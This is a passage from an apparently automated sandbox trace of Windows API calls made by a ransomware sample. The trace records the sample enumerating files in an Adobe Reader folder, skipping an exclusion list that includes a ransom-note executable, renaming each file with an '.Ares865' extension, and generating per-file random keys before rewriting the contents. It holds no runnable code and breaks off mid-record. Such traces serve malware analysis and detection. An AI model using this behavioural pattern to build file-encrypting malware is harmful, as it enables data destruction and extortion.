[0154.372] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm.Ares865") returned 60 [0154.372] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm.ares865"), dwFlags=0x1) returned 1 [0154.374] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.374] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6072) returned 1 [0154.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.375] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.375] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.375] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.375] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.375] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1ac0, lpName=0x0) returned 0x170 [0154.377] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ac0) returned 0x190000 [0154.378] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.379] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.379] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.379] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.379] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.380] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.380] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.380] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.380] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.380] CloseHandle (hObject=0x170) returned 1 [0154.380] CloseHandle (hObject=0x118) returned 1 [0154.380] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.380] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.380] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.380] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4090, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeK.htm", cAlternateFileName="")) returned 1 [0154.380] lstrcmpiW (lpString1="ReadMeK.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.380] lstrcmpiW (lpString1="ReadMeK.htm", lpString2="aoldtz.exe") returned 1 [0154.380] lstrcmpiW (lpString1="ReadMeK.htm", lpString2=".") returned 1 [0154.380] lstrcmpiW (lpString1="ReadMeK.htm", lpString2="..") returned 1 [0154.380] lstrcmpiW (lpString1="ReadMeK.htm", lpString2="windows") returned -1 [0154.380] lstrcmpiW (lpString1="ReadMeK.htm", lpString2="bootmgr") returned 1 [0154.380] lstrcmpiW (lpString1="ReadMeK.htm", lpString2="temp") returned -1 [0154.380] lstrcmpiW (lpString1="ReadMeK.htm", lpString2="pagefile.sys") returned 1 [0154.380] lstrcmpiW (lpString1="ReadMeK.htm", lpString2="boot") returned 1 [0154.380] lstrcmpiW (lpString1="ReadMeK.htm", lpString2="ids.txt") returned 1 [0154.380] lstrcmpiW (lpString1="ReadMeK.htm", lpString2="ntuser.dat") returned 1 [0154.380] lstrcmpiW (lpString1="ReadMeK.htm", lpString2="perflogs") returned 1 [0154.380] lstrcmpiW (lpString1="ReadMeK.htm", lpString2="MSBuild") returned 1 [0154.380] lstrlenW (lpString="ReadMeK.htm") returned 11 [0154.381] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm") returned 52 [0154.381] lstrcpyW (in: lpString1=0x2cce452, lpString2="ReadMeK.htm" | out: lpString1="ReadMeK.htm") returned="ReadMeK.htm" [0154.381] lstrlenW (lpString="ReadMeK.htm") returned 11 [0154.381] lstrlenW (lpString="Ares865") returned 7 [0154.381] lstrcmpiW (lpString1="MeK.htm", lpString2="Ares865") returned 1 [0154.381] lstrlenW (lpString=".dll") returned 4 [0154.381] lstrcmpiW (lpString1="ReadMeK.htm", lpString2=".dll") returned 1 [0154.381] lstrlenW (lpString=".lnk") returned 4 [0154.381] lstrcmpiW (lpString1="ReadMeK.htm", lpString2=".lnk") returned 1 [0154.381] lstrlenW (lpString=".ini") returned 4 [0154.381] lstrcmpiW (lpString1="ReadMeK.htm", lpString2=".ini") returned 1 [0154.381] lstrlenW (lpString=".sys") returned 4 [0154.381] lstrcmpiW (lpString1="ReadMeK.htm", lpString2=".sys") returned 1 [0154.381] lstrlenW (lpString="ReadMeK.htm") returned 11 [0154.381] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm.Ares865") returned 60 [0154.381] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm.ares865"), dwFlags=0x1) returned 1 [0154.384] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.384] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16528) returned 1 [0154.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.384] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.385] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.385] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.385] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4390, lpName=0x0) returned 0x170 [0154.387] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4390) returned 0x190000 [0154.388] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.389] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.389] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.389] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.390] CloseHandle (hObject=0x170) returned 1 [0154.390] CloseHandle (hObject=0x118) returned 1 [0154.390] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.390] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.390] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.390] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4444, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMePOL.htm", cAlternateFileName="RECE99~1.HTM")) returned 1 [0154.390] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.390] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2="aoldtz.exe") returned 1 [0154.390] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2=".") returned 1 [0154.390] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2="..") returned 1 [0154.390] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2="windows") returned -1 [0154.390] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2="bootmgr") returned 1 [0154.390] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2="temp") returned -1 [0154.390] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2="pagefile.sys") returned 1 [0154.390] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2="boot") returned 1 [0154.390] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2="ids.txt") returned 1 [0154.390] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2="ntuser.dat") returned 1 [0154.390] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2="perflogs") returned 1 [0154.390] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2="MSBuild") returned 1 [0154.390] lstrlenW (lpString="ReadMePOL.htm") returned 13 [0154.390] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm") returned 52 [0154.391] lstrcpyW (in: lpString1=0x2cce452, lpString2="ReadMePOL.htm" | out: lpString1="ReadMePOL.htm") returned="ReadMePOL.htm" [0154.391] lstrlenW (lpString="ReadMePOL.htm") returned 13 [0154.391] lstrlenW (lpString="Ares865") returned 7 [0154.391] lstrcmpiW (lpString1="POL.htm", lpString2="Ares865") returned 1 [0154.391] lstrlenW (lpString=".dll") returned 4 [0154.391] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2=".dll") returned 1 [0154.391] lstrlenW (lpString=".lnk") returned 4 [0154.391] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2=".lnk") returned 1 [0154.391] lstrlenW (lpString=".ini") returned 4 [0154.391] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2=".ini") returned 1 [0154.391] lstrlenW (lpString=".sys") returned 4 [0154.391] lstrcmpiW (lpString1="ReadMePOL.htm", lpString2=".sys") returned 1 [0154.391] lstrlenW (lpString="ReadMePOL.htm") returned 13 [0154.391] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm.Ares865") returned 62 [0154.391] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm.ares865"), dwFlags=0x1) returned 1 [0154.393] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.393] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17476) returned 1 [0154.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.394] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.395] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.395] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.395] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4750, lpName=0x0) returned 0x170 [0154.396] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4750) returned 0x190000 [0154.398] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.399] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.399] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.399] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.400] CloseHandle (hObject=0x170) returned 1 [0154.400] CloseHandle (hObject=0x118) returned 1 [0154.400] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.400] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.400] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.400] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4318, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeRUM.htm", cAlternateFileName="README~4.HTM")) returned 1 [0154.400] lstrcmpiW (lpString1="ReadMeRUM.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.400] lstrcmpiW (lpString1="ReadMeRUM.htm", lpString2="aoldtz.exe") returned 1 [0154.400] lstrcmpiW (lpString1="ReadMeRUM.htm", lpString2=".") returned 1 [0154.400] lstrcmpiW (lpString1="ReadMeRUM.htm", lpString2="..") returned 1 [0154.400] lstrcmpiW (lpString1="ReadMeRUM.htm", lpString2="windows") returned -1 [0154.400] lstrcmpiW (lpString1="ReadMeRUM.htm", lpString2="bootmgr") returned 1 [0154.400] lstrcpyW (in: lpString1=0x2cce452, lpString2="ReadMeRUM.htm" | out: lpString1="ReadMeRUM.htm") returned="ReadMeRUM.htm" [0154.400] lstrlenW (lpString="ReadMeRUM.htm") returned 13 [0154.400] lstrlenW (lpString="Ares865") returned 7 [0154.400] lstrcmpiW (lpString1="RUM.htm", lpString2="Ares865") returned 1 [0154.400] lstrlenW (lpString=".dll") returned 4 [0154.401] lstrcmpiW (lpString1="ReadMeRUM.htm", lpString2=".dll") returned 1 [0154.401] lstrlenW (lpString=".lnk") returned 4 [0154.401] lstrcmpiW (lpString1="ReadMeRUM.htm", lpString2=".lnk") returned 1 [0154.401] lstrlenW (lpString=".ini") returned 4 [0154.401] lstrcmpiW (lpString1="ReadMeRUM.htm", lpString2=".ini") returned 1 [0154.401] lstrlenW (lpString=".sys") returned 4 [0154.401] lstrcmpiW (lpString1="ReadMeRUM.htm", lpString2=".sys") returned 1 [0154.401] lstrlenW (lpString="ReadMeRUM.htm") returned 13 [0154.401] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm.Ares865") returned 62 [0154.401] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm.ares865"), dwFlags=0x1) returned 1 [0154.403] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.403] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17176) returned 1 [0154.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.404] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.404] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.404] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.404] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.404] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.405] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4620, lpName=0x0) returned 0x170 [0154.406] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4620) returned 0x190000 [0154.407] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.408] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.408] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.408] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.408] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.409] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.409] CloseHandle (hObject=0x170) returned 1 [0154.409] CloseHandle (hObject=0x118) returned 1 [0154.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.409] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4872, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeRUS.htm", cAlternateFileName="README~3.HTM")) returned 1 [0154.409] lstrcmpiW (lpString1="ReadMeRUS.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.409] lstrcmpiW (lpString1="ReadMeRUS.htm", lpString2="aoldtz.exe") returned 1 [0154.410] lstrcpyW (in: lpString1=0x2cce452, lpString2="ReadMeRUS.htm" | out: lpString1="ReadMeRUS.htm") returned="ReadMeRUS.htm" [0154.410] lstrlenW (lpString="ReadMeRUS.htm") returned 13 [0154.410] lstrlenW (lpString="Ares865") returned 7 [0154.410] lstrcmpiW (lpString1="RUS.htm", lpString2="Ares865") returned 1 [0154.410] lstrlenW (lpString=".dll") returned 4 [0154.410] lstrcmpiW (lpString1="ReadMeRUS.htm", lpString2=".dll") returned 1 [0154.410] lstrlenW (lpString=".lnk") returned 4 [0154.410] lstrcmpiW (lpString1="ReadMeRUS.htm", lpString2=".lnk") returned 1 [0154.410] lstrlenW (lpString=".ini") returned 4 [0154.410] lstrcmpiW (lpString1="ReadMeRUS.htm", lpString2=".ini") returned 1 [0154.410] lstrlenW (lpString=".sys") returned 4 [0154.410] lstrcmpiW (lpString1="ReadMeRUS.htm", lpString2=".sys") returned 1 [0154.410] lstrlenW (lpString="ReadMeRUS.htm") returned 13 [0154.410] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm.Ares865") returned 62 [0154.410] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm.ares865"), dwFlags=0x1) returned 1 [0154.415] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.415] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18546) returned 1 [0154.415] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.415] 